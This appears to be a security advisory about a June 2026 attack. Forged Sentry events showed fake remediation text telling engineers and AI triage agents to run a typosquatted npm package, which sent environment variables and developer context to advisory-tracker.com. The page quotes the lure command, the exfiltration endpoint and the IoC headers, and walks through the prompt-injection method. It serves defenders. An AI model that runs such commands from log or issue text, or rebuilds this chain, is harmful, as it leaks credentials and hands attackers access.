@sentry-internals / @sentry-browser-sdk profiling-node typosquat via forged Sentry events
On 2026-06-03 Nutrient (PSPDFKit) caught a novel two-stage attack: an attacker submitted forged Sentry events through a public browser DSN, displaying "remediation" runbook text that instructed responders (and AI agents) to run npx @sentry-internals/profiling-node --diagnose. The typosquat — and its sibling @sentry-browser-sdk/profiling-node (v1.0.0–1.0.5) — exfiltrated env, working-directory, and dev-context data to advisory-tracker.com before npm replaced both with 0.0.1-security holders.
- Detected by
- Nutrient · PSPDFKit
- Ecosystems
- npm
- Packages tracked
- 2
What happened
Nutrient (the company behind PSPDFKit) published detection tooling and IoCs for an attack chain caught in their own Sentry tenant on 2026-06-03. The attack is novel because no Sentry account was compromised and no npm maintainer was hijacked — the attacker only needed (a) a public browser DSN (which Sentry exposes by design for in-browser SDK use) and (b) the ability to publish a new typosquat package on npm.
Attack chain
At 12:27 CET on 2026-06-03 the attacker published @sentry-internals/profiling-node@1.0.0 to npm. A sibling package, @sentry-browser-sdk/profiling-node, was published across versions 1.0.0–1.0.5 between 2026-06-01 and 2026-06-02. Both impersonate the legitimate @sentry/profiling-node SDK; the namespace twists are subtle (@sentry-internals vs the real @sentry-internal, and the fabricated @sentry-browser-sdk scope).
The attacker then submitted crafted events to a target's public Sentry browser DSN. The event payloads were structured to render in Sentry's issue list as if they were maintainer-written runbook entries — complete with a "Resolution" section, a diagnostic transcript, and the recommended remediation command npx @sentry-internals/profiling-node --diagnose. Engineers or AI agents triaging the issue would see what looked like a legitimate remediation instruction inside their own observability platform.
When executed, the malicious package printed plausible profiling-diagnostic output, then exfiltrated process.env, the working directory listing, git config, and surrounding dev context to https://advisory-tracker.com/api/v1/telemetry (resolving to 52.206.47.180). The exfil HTTP request carried a User-Agent: profiling-node/1.0.0 and a X-Tenet-Security: ResponsibleDisclosure [SECURITY SCAN] header — IoCs that defenders can grep against.
Detection and response
Nutrient's AI triage agent flagged @sentry-internals/profiling-node as an unknown, suspicious typosquat and refused to run it, escalating to the security team — the first publicly-documented case of an AI assistant catching an observability-channel prompt-injection chain. Reports were filed to npm (14:28 CET) and to Sentry (14:48 CET) the same afternoon. npm replaced @sentry-browser-sdk/profiling-node with the canonical 0.0.1-security holder and fully unpublished @sentry-internals/profiling-node. The PSPDFKit/sentry-npm-typosquat-2026-06-iocs GitHub repository was published the same week and archived on 2026-06-06.
Why this matters
This is a new attack class: every Sentry tenant that ingests events from a public-facing browser SDK is a potential observability-channel attack surface. The same technique works against any logging / error-tracking / issue-tracker system that (a) accepts unauthenticated ingestion via a public key and (b) renders incoming content into a UI that an AI agent or human responder treats as trusted maintainer instruction. The defensive perimeter has to move: alert content, logs, ticket bodies, and observability event text are now untrusted input.
Affected packages (2)
- npm
@sentry-browser-sdk/profiling-node1.0.01.0.11.0.21.0.31.0.41.0.5 - npm
@sentry-internals/profiling-node1.0.0
Impact
- Developers or AI coding agents that ran the suggested
npx ... --diagnosecommand exfiltrated environment variables, working-directory file lists, and shell context toadvisory-tracker.com(52.206.47.180) - Both packages typosquat the legitimate
@sentry/profiling-node(note:@sentry-internalsvs Sentry's real@sentry-internalnamespace, and a fully fabricated@sentry-browser-sdkscope) - Novel attack class: the typosquat is delivered via observability-channel prompt injection — any application accepting unauthenticated browser-DSN ingestion can be coerced into displaying attacker-controlled "fix this" instructions in its own Sentry issue list
- AI triage agents (Claude Code, Cursor, Copilot) reading Sentry issue bodies are the primary intended victim — the runbook text is engineered to look like a legitimate maintainer remediation comment
- No npm account compromise required: the attack runs entirely off the victim's own Sentry tenant and the attacker's freshly-published typosquat package
What to do
- 1Audit npm install logs, lockfiles, and shell history for
@sentry-internals/profiling-nodeor@sentry-browser-sdk/profiling-node— the legitimate package is@sentry/profiling-node - 2Treat any host that ran either
npx ... --diagnosecommand as exposed: rotate any credentials reachable from that shell environment (cloud provider, GitHub, npm, AWS profile keys) - 3Block egress to
advisory-tracker.comand52.206.47.180at network/CI/dev-workstation perimeter - 4Strip or sanitise issue-body content before feeding it to an AI triage agent — treat Sentry event/issue text as untrusted user input
- 5Restrict the set of npm packages an AI agent can
npx-execute without explicit human confirmation, especially for newly-published packages with no prior history - 6For Sentry tenants exposed to public web traffic: review the documented IoC event IDs
fef0ad8b5e374b92a3098ae126d57ce3andff3323c0ff3a4b1884329049b8287f06against your event history
References
- Nutrient / PSPDFKitPSPDFKit/sentry-npm-typosquat-2026-06-iocs (IoCs, detection scripts, REPORT.md)github.com
- NutrientEmerging threats: Your logging system may be an agentic threat vectornutrient.io
- npm@sentry-browser-sdk/profiling-node on npm (security holder 0.0.1-security replaces malicious 1.0.0–1.0.5)registry.npmjs.org
- npm@sentry/profiling-node (the legitimate Sentry SDK these typosquatted)npmjs.com